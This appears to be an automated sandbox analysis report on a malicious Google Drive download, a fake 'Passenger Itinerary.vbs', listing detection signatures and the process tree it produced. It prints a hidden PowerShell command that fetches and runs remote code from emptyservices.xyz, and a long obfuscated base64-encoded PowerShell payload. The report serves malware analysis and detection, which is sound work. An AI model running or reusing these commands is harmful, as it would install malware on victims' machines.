Analysis

  • max time kernel
    58s
  • max time network
    58s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-11-2024 19:08

General

  • Target

    https://drive.google.com/open?id=1uBKuZ8MdOSwUgl8qiQAAGvyswRZqIu92

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://drive.google.com/open?id=1uBKuZ8MdOSwUgl8qiQAAGvyswRZqIu92
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3412
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0x84,0x104,0x7ffe262ecc40,0x7ffe262ecc4c,0x7ffe262ecc58
      2⤵
        PID:2084
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1884 /prefetch:2
        2⤵
          PID:4168
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2132,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:3
          2⤵
            PID:1600
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2256 /prefetch:8
            2⤵
              PID:1400
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3136 /prefetch:1
              2⤵
                PID:1940
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3300 /prefetch:1
                2⤵
                  PID:2340
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4524 /prefetch:1
                  2⤵
                    PID:2496
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4888,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4908 /prefetch:1
                    2⤵
                      PID:3988
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4884,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5152 /prefetch:8
                      2⤵
                        PID:3688
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5148,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5412 /prefetch:8
                        2⤵
                          PID:2372
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Passenger Itinerary.vbs"
                          2⤵
                          • Checks computer location settings
                          PID:1812
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
                            3⤵
                            • Blocklisted process makes network request
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4164
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand DQAKACAAIAAgACAAJABSAE8AcQBGAHcAZwBvAEEAIAA9ACAAMgA1ADEAMAANAAoAIAAgACAAIAAkAFMAagBYAFEAVQB4AGIAWAAgAD0AIAAoAFsATQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABZAEgAWQBVAHIAZgBPAHoAKQAgACoAIAA0ADQAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkADQAKACAAIAAgACAAJABKAFMAVQBTAG0ATQBVAFkAIAA9ACAAIgAyACIADQAKACAAIAAgACAAJABVAGIAZQBFAGMAWQBPAGYAIAA9ACAAIgBTACIADQAKACAAIAAgACAAJABVAGQATwB3AEsAZgBJAHgAIAA9ACAAIgA2ACIADQAKACAAIAAgACAAJAB6AEQAZQBiAG4AeQBBAEYAIAA9ACAAIgBWACIADQAKACAAIAAgACAAJABzAE8AcQBWAE4AWABWAGYAIAA9ACAAIgBHACIADQAKACAAIAAgACAAJAByAG8ATwBaAHEASQBhAHcAIAA9ACAAIgBLACIADQAKACAAIAAgACAAJABmAEEAZQB5AEUAagBoAEMAIAA9ACAAIgA3ACIADQAKACAAIAAgACAAJABQAFEAWQBzAFAAbABBAGcAIAA9ACAAIgByACIADQAKACAAIAAgACAAJABPAFAASQBhAEYAZABaAEcAIAA9ACAAIgBxACIADQAKACAAIAAgACAAJABtAHUAZwB3AEgAdwBpAE4AIAA9ACAAIgBsACIADQAKACAAIAAgACAAJABnAFIASABxAEcAeQBYAEUAIAA9ACAAIgBsACIADQAKACAAIAAgACAAJABmAEIAbgBsAE0AQgBaAEYAIAA9ACAAIgBGACIADQAKACAAIAAgACAAJABFAE4AZQBYAGYATwBOAE4AIAA9ACAAIgBLACIADQAKACAAIAAgACAAJABmAFMATgBGAHIAWgBCAEcAIAA9ACAAIgBKACIADQAKACAAIAAgACAAJABuAHgASgBGAEkAYgBSAEQAIAA9ACAAIgBiACIADQAKACAAIAAgACAAJABPAEYAVQBGAFoAYQBiAFoAIAA9ACAAIgBrACIADQAKACAAIAAgACAAJAB0ADEAIAA9ACAAOAAwACAAKwAgADgAOAANAAoAIAAgACAAIAAkAHQAMgAgAD0AIAAoACQAdAAxACAAKgAgADQAKQAgAC0AIAAoACQAdAAxACAALwAgADkAKQANAAoAIAAgACAAIAAkAHQAMwAgAD0AIAAiADIAIgAgACsAIAAiAFMAIgAgACsAIAAiADYAIgAgACsAIAAiAFYAIgAgACsAIAAiAEcAIgANAAoAIAAgACAAIAAkAHQANAAgAD0AIAAiAEsAIgAgACsAIAAiADcAIgAgACsAIAAiAHIAIgAgACsAIAAiAHEAIgAgACsAIAAiAGwAIgANAAoAIAAgACAAIAAkAHQANQAgAD0AIAAiAGwAIgAgACsAIAAiAEYAIgAgACsAIAAiAEsAIgAgACsAIAAiAEoAIgAgACsAIAAiAGIAIgAgACsAIAAiAGsAIgANAAoAIAAgACAAIAAkAHAAIAA9ACAAJAB0ADMAIAArACAAJAB0ADQAIAArACAAJAB0ADUADQAKACAAIAAgACAAJABhACAAPQAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABwACkADQAKACAAIAAgACAAJABkACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgB0AEQAYgAvADEAWABhADAAVQBNAHUATgBlADMASwBzAFoAawB3AEEAYgBvAEUAaABtADQAUgBEAHkAWQB4AHQAKwBxAGoAZQBFAEUAdAA3AHoAdAA0ADAASQBPAFQAdwBrAHgAdQBmAG8AcgBnAE0AbwB2AEUAUAB3ADUAZAA1AHYAaQBaAEIAdwBiAHMAZAAvAFkAZgBQAE8AMgBZAHkARABjAEMAaQBkAFQAQQB0AGwAYgBXAHMAUQB4AGUAVgB2AE8AQwBxAE4ARABPAHgAVAB4AGcAcgBDACsAOQBGAEIAYgBKAEcAKwBkAHIASwBHAEwAUgBkAFgAaQBXAGgASgByAHAAVwBjAHcAWgBBAEoAYwA3AEQAMQBPAFgAUgBNADMAcwBJAEgAUABwAEUARQBPAFEAZwB2AEoAQQBqAFkAdQBRAE0AWgBCAFcARwBOADcAeABZAEwAVwBXAHcAUQBoAHEAcgA3AEgAYwB0AEUARgBuAEUAdwA1ADgAbgBlAFIAbABlAFMAMgBLAFEALwAxADkANQBvAEsAQgBuAEwAawBiAEMAdABsAHAAegAxADIATQBSADUAYgA2AFIATQBZAFoAcgBvACsAZgA5AEIARQArAFcAcQA3AHoARwBIAFAAeQA5AC8AQwBSAE4AbAA5AFUAUwBRAGQAMgA2AGYAcgBNAFoANgArAFQAawBSAGkAYQA1AEgAbQBnAHQAbgA5AG0AUgBTAHcATQBYAEoAaQAxAC8AbgB2AGIAWgAwAFgAagBzAFcAcgBDACsAMQBIAGgAYgBPAHYAOABEADAANQBsADYAeQA4ADUAWABlACsATwA5AGMAOAA2AGYAWAB2AFcAMgAzADcAQwBpADgANwBWAEcAUABpACsARwBqADEATwA5AGQAcAA5AEgAMQA2ADAARgBQAEcAOAAwAE8ANwAzAGwAVwBRAEsAaABYADYAQwB2AFEAVgBiAHAAagBpAEEATQBJAGMAWQBXADcAWQBpAGIAcgBwADEAVgBCAGgAUwBLADIAQgBrAEQAdgB5AEcAKwBaAFQANgBWAGIAawBoAFIAMgB3AGQAOABaAGoAeABCAFoASgBDAE0AVgBLADUASQAwAGQAYgB1AHYANwBVAGoAUgBVAE8AVQAzAEEANgBqADgANgA0AFcATAA1ACsAUwBJAEIAegBvACsAaABHAHcAQgArAFYAMABiAHYAUABwAGoASgBMAFYAVAAzAE8AdgBGAFcAVgBEADIAZgBXADAAbAA0AFAAQQBGAFkATgBXAG4AeQBJAGQAbwBoAFcAawBVADgAVgBXAEkAOQAyACsAWABjAFMATAB4AFkAdAAxAFUAbQBpADIATABuADQAYwA2AEcAZwBKAGYARQBBAFEANwBXADcAeABiAEEAWABSAHEAMwBlAEYAcQBkAGsATgBOADQAZQBvAEcAVABYADgATwBSAEgAZABCAFkASQA3AFcAZQAyAGcAZwBFAFoAcgBJAEUAWgBWAHkAMAA5AGsANgBrADQAOQB4AHQAaQBDAGUAZQBIAHgAVwA2AGoAQQBtADQASQB2AHkAYQBmADIATgBNAEMAbgBtAFMARABoACsAaQBwAGQANgBVADYAQQA4AFIAOABTAHAATQB3ADQAeQA3AGUAbABFAEgAKwA2AGcAQQBlAGYANwBaAG4AMwBEAEkAcQBtAHkAUwBxAG8AUAB4AE4AaABzAGQAMwBWAHMAeABEAFoAbwBoAEkAKwBlAE0ANQA1AGsAWABlADQAZABxAGYAVAA2AEsATAArAEkASgBoAGQAdgAyAGoAWgBaAHcAegBUAFMARwBmAGMAbQBiAHMAdwAwAEcAZwAyAGIAeABHAGcARwBjAHUAeQB2AHAAdABTAE8AcQB0AFEASAAxAHoAUwBzAGkARAA3AFcAVABlAFUAZgBYAFAAMQBZAGMAVABNADMANQBzAGIAegBXAFoAeQB0AHgATABvAHcAaABzAFIARQBkAGYANQBZAFgAOQBXAFcAYQBtAFYAOQAxAGEAOQBtAGEAUQBKAGYAcwAvAE8AOQA4AHIAUwB5ADIAaABpAG4AdwBHAFAANwB6AEYAMwBkAHAAVABSAFMAMwArAFIAbgBDACsAdQBqAEUAZAB4ADAANwA2AEEAbgA5AHQAUQBKAEQAUgByAE8AaQBGAHkANQBrAFAAbQA0ADgAVABUACsAcgBZADcAagBpAGYAVwBXAHEAcgBmAE4ANQBWADAAKwBJAHoAdQBuAHEASwA1AHIANABZAEYATAA0AHAAUABKAGkAWQBZADEANwA2AFgAWQBHAGcATAAxAEMAdwBKAEcATABwAHcAeABjAFoARwBzAC8AQwBUAHgAUwAvAHkAcQAwADIAbgBtAFoARABjAG8AaQBnAGUAMgA0AHgASgBnAEcAUwBYAGEAdABKAGUAdQArAGYATgBwAEQAQgBFADQAZQAzAGoAdgB1AHEAVQAzAEcAaAA0AFYAMwBiAE0ASwA0AEoAOQBRAFcAeAA2ADAAZABsAFAAMgBYAE0AegBjADgAZQBLAFEAUQBiAC8AQgBqAFUAZQBUAE0ALwB3AHEATwBqAG8ASwBjAG4AWQB5AHgANQBSAHoAYwA4AFIASgBLAEIAdABvACsATQBUAGMAQwBHAEEAegA4AHgATAA5AEIANwAzADAAagBUAE4AVAB1AEkANQBMADQAOQBIAHEAcABaAFcAVwBiAFcAQgB0ADMAbQBPACsAVwA2AG0AUgBvAFAAcgBkAHgAdABlAG4AeQBRAGwASgAyAEkATQAxAHIASQBDAGoAYwBzAC8AaQBWAHAAMgBaAG4ANQBCAFEAQwBlAEIAWQBTAEUAWABCAEYARQBMACsARwBlAFIAbABCAFoAcAAyAEoANgBoADAAZQBEAGEASwBqADIAOQB3AFEAVQBsAEsAVQB4AEsAUAAzAGMAbgBFAEYAQgBaAGkATwAxAHIARAAwAGgALwBwAFQAMwA1AEgAdwBSAGoANwB3AEwAUAA4AHoASQA4AGwAYwBBAE0AcABoAGoAMABKAGsAQQA3AE8AegBqAHoAMQBUAEYAQQA3AFQAUQBwAFkAdgB2AGMARQBDAGcASgBlAGwARgBEADYARgB6AEQATgA5AHcAZgBaAGMAQQBSAEEAcABzAHMAegBOAGkATABCAHUATABrAEoANwBwAGwAbgBtADkAWQBzAEMAbgBSAGUAWQBiADEAZABTAFIAbwBEAHEAcgBjAEkALwBsAHEAWgBrAC8ATAA1ADUAaABZADgAbQBGAGUAMAAvADQAWgBFAHgARwBuAGEAMQBRAHkAbgBXAE0AawB6AFkAdQBtAG0AdABhAHcAcQAvAGYAOQB6AG0AQwB3ADIAUQBzAHUASAA4AFMARgBhAHgAOABuADkAcABQAFcAbgBpAFQAOQB3AEkAYwBRAHQASwBkAGkAUwBZAGEAVwBlAGgAcgBuAGIAWQBGADgAbgBaAGIASQBmAEsAQwBqAFkANABCAFYARQBjAEoAOAB0ADQARQBlAFIAZABtAHAATwBnADcAOABvADQAZwB0AEIAKwBjAEsAQQBGAGEARQBIADEAVwBoAGUAUgBvAFUAUABPAE4AMwBCAFUATQAvADQAMwBzAGEANQBWAG4AdgBiAEIARgBCAE0ASwBJAFYATgBwAGUAOQBFAFkAVQByAE0AcgBKAHIATwBMADYAQQBQAFcASQBGAGsANgBDAEsAcwAwAFIAeQBMAGIAdwBPAFcARABZAEIAegBYADYAUgAyAC8AUABIACsARABDAFEAQQBuAEkAQwBFAHYAVwB4AHcAUwA5AHAASgAzAFEAeQBWAGYAVgBGAGUAdgBUAGUANwBXADgAYwBjAHkAUABuADYAVABOAFUANwBCAGcAbgBmAEQATwBUAEgAUgB2ADUAdQBzADMAbQBxAHQAdAB5ADgAMAB1AHEAKwBZAHYASgBxAG8AWABmAGEAcQBsAG8AWABLAGEAZwBIAGoAWQArAEsAegA2AGoANQBxAEoAQQBBAE4AKwA0ADIAVgBCAHgAbAB1AGkATgBhAGcAbQBnAG4ATABvAHkANABRAGsAQQA4AEYAYgBDAEcAeABEAE0AcgBXADMAMgBoAHkATgBuAFMAZABoADYAOQBwAFUAMQBLAEMAagBVAEMAMABwAHEAawAvAGEAVgB3AGoASABtAFIASgAzAGMAOQBFAGMAZQBrAHQAdgBJAGgARwBLAGYAMgBxAFMAUABPAHkAcgBCAFMAVwBNAFUAbgA1AEUATwA3AEUAdQArAG8AUgB0ADIAVQA5ADgAdgBGAG0AcgA1AGEAVQBsAEUAMwArAEgAQwBMAGoASABMAHEAbABzAEsALwBuADMATwA4AGkAcwB6AGYAUAB6AGgAcgA3AGwAZwBQAGkARgBpADEAZQBoAG4AMgBDAHIAWgBqADMAbABuAEgAUgBHAEQAZQBnADkAMQBhAHMAYQBsAGIAMQBNAEMAdQAzAGYAZgBJADYAWABNAG0AKwA0AFIANwB1AEIANABGAFQAaQA3ADgAOABnAEYAaABjADcAVgBLAE4AbgB2AGgALwA1ADAAawB3ACsAOQBOAGIAYwAxAHkAZQBNACsAZgAvAEkAdwBNAHkAVgBVAGMAWAB5AG0AeQAyADUAcQA4AGQAUgB1AGMAawBlAFgAaABYADgAZQB5ADUASgAvAHkAcABrAGEAVgBzAHIAcABOAEsANQBaAEIAVAB3AHUAZgBuADkAOQBxAHcAWABiAHoAZwAvAG4AeQBYAHAAQwBhAEEAbwA2AFcAYwA0AG0AUQBSAGQAUwBVADkAcAByAGoAcQByAEcAZgBqAE8AQwBtAHYAeQA1AFUAYgBvAEMAOAAwAGgAVgBhAGoAWQBjAFIAUgAxAFYAcgBQADEATQBvAGoAUgAyAHQAOABIAEkASgB4AFcATABYAEwAMQAwAEYARAB3AE4AQgBCAHAAUAB3AFEATgBYAGwATgBPAFIASQB4AGYARgBiAGQAdgB5AGMAVwBzAFAAWABxAEcAZABSAHYARAB6AFQAUwA1AFEAbQBpAHkAeABIAHUAZwBlAGsAeAA1AFQAWQBwADMAcABQAFMAaQBJAHUANwBPAHYASwBXAFcAbgBaAGkAZQBwAE4ASQBoADYAZwAwAHUARQB3AHcATgBzAGgAdQBuAFMATABpAGUAZQAyAFUAbwBLAFgANwBOAHMASQBhAGYARQBFAHYAZQBhADYAMgBBAEgAaABQAEgAOQBpADYAWgBWAEgAUAAxAGgASgBhAFAAYgBDAFcAaABOADkAMwAwADEAdgBNAE8AbABwAEsAMwBuAEMAQwBzAFMALwA1AHgAZABKAG4ARABlAFoAegAyADkASgB3AFUAZgBXADcAeQBBAGcARgBXAHUAaQA5ADMAUgB2AE4ANwBDAEMAdABBAEIAYgB0AEUAVABQAGgAOABPAFgARQBQADYAVgA0AFkAZABLADMATQB6AGEAdAB6AG4AVQBBAFMAQwAvAFAASAB6AHcAWQB4AG4ANwBuAEgAVQArAFEATABxAC8AZgBJAG8ARABIAGUAagBmAFYAVQBvAE8AMwBDAGcAcwBYADYAaAA4AFoAbgBoAEoAMABCAEUAYwB5ACsASABzAGUAWgBNADEAWQAyAGYANgBmAHgAcABwADIAdABFADkAbQBlAEkAagBRAHcAcQB5AGMARgB5AEMASwBoAFQASwBtAGgAYwBZADgAYgA4AEUANgBpADYAcAA3AE4AbQBSADUASgBhADMAWAA0AEkASwBMADkAUQAzAGkAdAB1AHkAbQB2AGIAaABLADAAYgBoAHYAYgByADkAYgBCAGQAQwBNAGgAYwBLAEUAMQBBAEgAbwBBAEMAdwBjAG4ASABFAGIAaABxAHYAbwBFAG8AdQBOAG4AbQBqAGQAeQAyAEMAdABJADIAWABCAEYAbQBUAG4ARQBhAFoAbwBiADIAagBOAGoAVgArAE0AUwA3AEkAYgBiAHcAVgBSAHcASQBXAHIAYQB1AEQATQBVAFUAUgB6ADkARABvADgAMAA2AGUAdwArAHoANQB0AFYAeAAzAG4AYwBzAE0AUgBHAEQASwBZAFIATABWAE4AMgBlADcAWQBjAE8AOQA3AEoAZgBhAEQAQgBhAGEAdgAvAHIARQA4AHAAeAAyAHAAaAAzAHUASgBhAE4AZABTAFIANABFAHkAOABQAHkAZwBqADEARwB4ADAAWgBMADEAUgArADYAZgBWAFcAaABnAHYARABrAGkAagBSAGsAWAA5AG4ATAAxAFkASwBVAHoAaQBLAG8AaABJADEAUAB1AHAAbwAyADkAKwB1AG8AWgAzAHYAMQBYAFEANABUAEcAYQBxAEQANQA0AHEAOQBoAFMAcQB1AFoARABDAFMASgA0ADAAaABpAEgARABVAEwAUgBEAHcAZAA4AEQAZQBqADMAMQBqAFAAcQA2AC8AegBzADEAZQBBAEIAaAA0AGkAUQBIAGoAbwBNAHQAQQBIAGYAVwB6AGgAQQB1AEwAeQBaADUATgBOAFIARwBkADYAdABhAFEANgBVAGgASgBTAGkAbABGAHYAdQA1AGsAWQBxAGsAbgB3AHcAYwBTADcAZgBjAGIAVgBuAFYAbQBlADQASgBZADUANQBWAGQAKwBwADIAZAAvAGEAZgBSAGYAcABNAEEAawBOADUANgBHADIAWgBBAEYAcQBJADgARABtAEcAVABFAGQAcwBDAFAAWABwAHAAVQBoAGsAOABhADYAUABWAGwAMQBHAFUAUwB1AGIAWgBiAGUAQgBPAE8AOABNAGgAUQBRAFQAZgBnAEsAbQBIAGgAWQBUAFcAQQB0AE4AQwBsADMANABEAHgAcwBRAHMATABxAFIAZAB4AHQAdgA3AEMAVgBaAGMAQgBaAFAAYgBsAGUASQB4AEEAeQBzADMAQwA3AEUANgBkAG8AcABkAHEAdABRAGQAVwBMAFUAQgBuAHUAUwA4AEIAaABoAEIAUQBBADgAQQAwADcAawBjAHAANwBrAHoARwBEAHgAQwBiAEQAeABRAHEAeQBIADQAdwA2AFMARgBFADMAbwB2AEwANQBPAEYAUgBMAFMAcwBLAEYATwA0AEgAOQB6AGIAawBDAFYAUwBUAGkAVQBIADgAYQBUAHQAMQAxADMARgBqAHIANQBMAHAAVgBFAEkAMgBvAFoATwA1AGkAdABQAHAAcgA4AEMANgBYAEEAQwA4AFAAbQBKAGkARwArAEUAaQBOAGMAMQBKAE0AUABQAGgATQBUAHEAbgB1AGoAYwBPAHUAUQBpAGsAcQBzAHIAUwB6ADIAaAB1AGwAaABxAEIAZwB2AGQAdQBYAEQAZgAvADEARABaAGoARABHADMARwBnAE8ASgBkAHcAOQA2ADgAWQBjADQAMwBuAFkALwB5AE4AZgBoAGwAOQBtAG8AdAByAHQAagBiAGQAQQBuAHIAcQBnAHUARABqAEgAWgBGAHgAVwBTAEYAVwB0AFcAeABWAE8ATgBTAHIAcgBNAHAANQB1AGcAMQBSADgAVwB5AHAANgBGAFcASQA3AHYANAA1ADgAbABOAEwAZwA4AHQAbQBKAHEAUwA0AG8AKwBFAHcAZQBxAEEATQArAG8AZgBmAHoAawBQAFEALwAvAHMAUwByAEQAMwB6AEgAdQBSAGYAdgAxAEwASQBCAHcAbgBDAE4AVgBRADIAUgBkAEkARAAwAHAANQBWAFMAKwBhAFUASgAyAGUAcABVAHYAWQByAEIAbQBLAGwAbQB2AGIANQBDAFYARwBpADkARQBMADQAbgBWAEUAbwBHADkAVwBHAHgAZQBDAG4AdABYAEMARgBVAGsARgBmAGkAYgBZAE4AYQBSAGkAdQA4AHMAbwBXAEgASwBxAE8AUQBiAHYAVwBEAG0ATABOAGYASwA1AEYAbQBhAGwAVABIAHIAQwBBAFQAZQAvAEUAMwA5AEwARAAvAEwANQA0AEgASgBQAFAAYQBkAHoAOQBrAFAARwB6AHUASABKADkAWQBlAHMANABnAGsAbQA2AGkATQBnAHcATwBBAEEARgBwADQATABFADUAMQB2ADQAdQBDAFoAOQBMAEYAWAA1AEcATQBYAEoAYQBnAEMAOQBHAHIAQQBpAFUAQwAzAGYAcwB5AFcAaABEAFAAVQBLADgANwBaADEAcAAwADAAVAB4AFgAUgBFAEcALwA0AFkAYgBSAEMAYwA1AHoASwBQAEkAMABhAEIAVgBWAHkAQgBjAGEANAA4ADMAWgBOAFoAVwBiAG4ASAB2AHIAYgBNAHUAUABCAEoAQwBoAHAAVQBTAHIAYwBHAE4ARwByADgAdABBAGcAcABmAE0ANgAzAEQANwB3AEYATABXAE0ATQAzADAAVgBOAG0ATgB4ADIAUAB3AEUAcgB5AC8AWgBNAE4AbgBVAFkAbgBSAEoAMwBCAHYAUQBkAHIAQQBVAHoAQgArAEUAeQBxAGUAUAB6AEUAbABNAHgAVQBoAGMAVAByAHQAeQBNADQATgA4AFUAVABpAGMASABQADAAdgBLADIALwBkAG8ARQBwADkAcgBvAEsARgBUAG4ARwAyAEoAcABMAEgAegBIAG4AbAArAEcALwA3AGcAZABXADUAVwBKAHQAaAB0AEkARABNAG4ASQA0AFIARQA3AGIAagB5AC8AZQBUADAAbgBFAHcAeABpAEMATwBrAFkAVgBwAFoATABxAFgASgB5AFcAMABXAEEAcwB1AGcAeQBjAEwAdgBXAEsAQQBZADcANQB1AEUASwA2AG4AQgBIAE0ATgA1AG8AQQBjADMAYgBYAEcAcwBFAFoARABGAEEARQBIAC8ARwBpAE8AcwA1AGEAYwBnAEMAWgBvAE8AWQBNAGUAcQBJAEcAUgBOAEwAegBzADAAegBxAEgAVABwAGMASgB6AHMAZABNAEUAUABiADkAZQB4AHgAdgB2AFAARgBuAFgARABHAGcAMwBHAEwAZQBpAFcAVQBkAHAASQA2AGEAKwBQAGwANABzADUAawBuAEYAcQBQAEUAaQA2AGIAOQAzAEYAcgBNAFcASQB0AEQAQgBPAHAATgB2ADYAQQB5AGgAaQB4AEEAbQBxAFQAYgBkACsAMQBuAGoALwBHAGwAOQBjAEUAYQBCAEgASQBQAEgAVwBTAFkATABJAFgARQBGAHYAVgBjAFMANQBaAHMAeABsAG0AVQB6AGMAWQBHAE8AUgB6AEIANgBUAGsAMgBGAFgATQB2AE4AagB2ADcAUAAyAEUAeABLADgAMwBXAGUAMQBQAFoAMgBrAFAAdgBWAGYAWQArADYAegBmAGEARABiAHIAOQBLAHYAVgBuAHQARwA5AFgARwBGAHYAUAA5AFYATQAzAGYANQBaAGUAWgBGAE0AawBGAHcAdABjADYAbgBVAE0AVABoAEgAYQBQAEoAcQBmAEUAawA5AHUAdQBwACsAZgBIAFMAQwAyADgAZQBHAGsANQA0AEsARABtAFUAUQBxAFYAcQBEAEcAMQBJACsANgBsAFQAawBDAGUAYwBHAE0ASwB1AFYAMQBKAGUAUgBSADEAdwBnAEcAWQBSAGoARgBvAHoAUgBvAGUAeQByAFgAagBxAGMAKwAzAFQATgBWAEMAZwB1AC8AMgBPADMAbQA5AGwAOAByAEYAMgBvAGUAUgBkAEkAVgA5AEgAdQA2AEQAeQAwAHoAYwBwAEIAZQBDAG4AMwBqAFIAaABEAHoANABXAG0AUgA5ADUATQBEAEYAOQBEAHkAYQB2AEwAZgB2ADkARwBhAEMAQQA4AEgAUgBrAEsASAB4AEYAcgByAHUAbwBCAHEASABwAFUAdgBMAGUARgA5AE4ANgBiAGcAVABJADgAdABMAFQAWQBiADcAaABPAG8AMgBhAHgARgBQADMAUABTAE4AcABXAFUAeAAvAEkASwBJAHgAagBxAGoAaAB2AGUAMABoAHgAVQBJAGUAeQAvADUAVgA0AC8ARQBBAEwAcQB5AHgASQBHAGUAKwAwADIANwAvAEgAMQBtADkAaQBXADcAaAA5AFMASAAy